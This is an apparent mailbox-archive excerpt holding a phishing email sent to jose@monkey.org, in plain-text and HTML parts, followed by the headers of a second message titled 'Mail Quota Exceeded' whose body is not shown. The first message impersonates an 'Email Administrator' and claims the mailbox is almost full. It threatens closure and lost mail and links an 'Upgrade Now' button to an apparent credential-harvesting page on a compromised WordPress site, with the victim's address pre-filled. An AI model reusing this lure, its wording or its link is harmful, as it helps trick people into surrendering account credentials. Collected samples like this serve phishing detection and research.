From: "MAIL CLIENT" <angeline.lim@acculex.net>
Date: Sun, 03 Apr 2016 06:38:56 -0700
Message-Id: <20160403133858.892CF4C490CC@postmaster.acculex.net>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 147

You will not see this in a MIME-aware mail reader.
--===============0272295029==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Your email ( jose@monkey.org ) is almost full.
 Current size

 =

    1989MB	  2000MB
 Maximum size
Your mailbox is running out of data storage and it might be close kindly to=
 add more MB to your mailbox.
 =

    =

    Upgrade Now
  =

If don't upgrade your mail box, you will not receive more emails frequently =

You will be finding it hard receiving emails. =

Your account might be closed =

Your important mail will be wiped away =

 Note: Upgrade if free of charge, you are not charge any service fee.
 Copyright ? 2015 Email Administrator. All rights reserved. ***************=
***************************************************************************=
****************************
CONFIDENTIALITY. This e-mail and any attachments are confidential and may a=
lso be privileged. If you are not the named recipient, please notify the se=
nder immediately and do not disclose the contents to another person, use it=
 for any purpose, or store or copy the information in any medium. Any views=
 expressed in this message are those of the individual sender, except where=
 the sender specifically states them to be the views of JK Technosoft Ltd. =
If you have received this e-mail in error please immediately notify the per=
son who has sent this email to you with copy to administrator@emailserver.c=
om
***************************************************************************=
*******************************************

--===============0272295029==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/>
<meta http-equiv=3D"Content-Type" content=3D"text/html" />
<title>Untitled Document</title>
<style type=3D"text/css">
<!--
.style1 {color: #FFFFFF}
-->
</style>
</head>

<body><P>Your email ( jose@monkey.org ) is almost full.</P>
<P>Current size<BR></P>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D266 height=3D29>
<TBODY>
<TR>
<TD bgColor=3D#0099ff width=3D210>
<DIV class=3Dstyle1 align=3Dcenter>1989MB</DIV></TD>
<TD bgColor=3D#0000cc width=3D56>
<DIV class=3Dstyle1 align=3Dcenter>2000MB</DIV></TD></TR></TBODY></TABLE>
<P>Maximum size<BR>Your mailbox is running out of data storage and it might=
 be close kindly <A href=3D"http://attack-attack.co.uk/wp-admin/images/gene=
ral/?email=3Djose@monkey.org" target=3D_blank></A>to add more MB to your ma=
ilbox.</P>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D144 bgColor=3D#cc=
cccc height=3D34>
<TBODY>
<TR>
<TD>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D138 align=3Dcente=
r height=3D24>
<TBODY>
<TR>
<TD bgColor=3D#0099ff>
<DIV align=3Dcenter><A class=3Dstyle1 href=3D"http://attack-attack.co.uk/wp=
-admin/images/general/?email=3Djose@monkey.org" target=3D_blank>Upgrade Now=
</A></DIV></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<UL>
<LI>If don't upgrade your mail box, you will not receive more emails freque=
ntly =

<LI>You will be finding it hard receiving emails. =

<LI>Your account might be closed =

<LI>Your important mail will be wiped away </LI></UL>
<P>Note: Upgrade if free of charge, you are not charge any service fee.</P>
<P>Copyright ? 2015 Email Administrator. All rights reserved. *************=
***************************************************************************=
******************************<BR>CONFIDENTIALITY. This e-mail and any atta=
chments are confidential and may also be privileged. If you are not the nam=
ed recipient, please notify the sender immediately and do not disclose the =
contents to another person, use it for any purpose, or store or copy the in=
formation in any medium. Any views expressed in this message are those of t=
he individual sender, except where the sender specifically states them to b=
e the views of JK Technosoft Ltd. If you have received this e-mail in error=
 please immediately notify the person who has sent this email to you with c=
opy to <A href=3D"mailto:administrator@emailserver.com">administrator@email=
server.com</A><BR>*********************************************************=
*************************************************************</P></BODY></H=
TML>
--===============0272295029==--

From jose@monkey.org Sun Apr  3 23:44:29 2016 +0000
Return-Path: ziaul.karim@bd.g4s.com
Delivered-To: jose@monkey.org
X-FDA: 71366498658.18.stop92_9f2548d84c03
X-Spam-Summary: 30,2,0,9ae432f27c6b8ec7,d41d8cd98f00b204,ziaul.karim@bd.g4s.com,:,RULES_HIT:41:72:379:474:495:800:962:967:969:973:978:983:988:989:1189:1208:1221:1254:1260:1261:1263:1313:1314:1381:1431:1433:1434:1436:1437:1516:1517:1518:1535:1542:1561:1571:1575:1588:1589:1592:1594:1710:1711:1714:1730:1749:1776:1792:2198:2199:2525:2527:2549:2560:2563:2682:2685:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3362:3650:3867:3868:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4552:5007:6238:6261:6653:6684:6688:7784:8599:8603:8784:8885:8987:9025:9059:9080:9388:9411:9468:9871:9908:10004:10248:10346:10400:11480:11658:11914:12043:12126:12438:12517:12519:12555:12658:12659:13025:13139:13237:13439:14093:14096:14181:14721:21080:30026:30054:30070,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fe,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:66,LUA_SUMMARY:none
X-HE-Tag: stop92_9f2548d84c03
X-Filterd-Recvd-Size: 5325
Received: from mail.bd.g4s.com (mail.bd.g4s.com [119.148.26.10])
	by imf16.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun,  3 Apr 2016 23:44:28 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=bd.g4s.com;
	 s=default; h=Date:From:To:Subject:MIME-Version:Content-Type;
	bh=KDw9xqY0U5qERlfqLZqBhIqB1ciIXOhC8KtXZ+1uxUM=; b=Of4ZQKKCtEkIo+usxq/W4vFpon
	9eF39/KgQghTPzNHAvivg8INcsYERS/kMSck8BgYbsFqodYIk4uZh5cMglyDU5+hqcP9h9wRPaSvx
	VsnCDBLaSoNksH9rOx/JtbA7+boG9nkzJ/5TSZAf9cuX9Vc2RFVALcpsy5zXPz5mppIo=;
Received: from pd95cc832.dip0.t-ipconnect.de ([217.92.200.50]:55614 helo=[192.168.0.100])
	by panel1.agni.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.86_1)
	(envelope-from <ziaul.karim@bd.g4s.com>)
	id 1amrgv-00032g-5j
	for jose@monkey.org; Mon, 04 Apr 2016 05:44:25 +0600
Content-Type: multipart/alternative; boundary="===============0142135429=="
MIME-Version: 1.0
Subject: Mail Quota Exceeded
To: jose@monkey.org
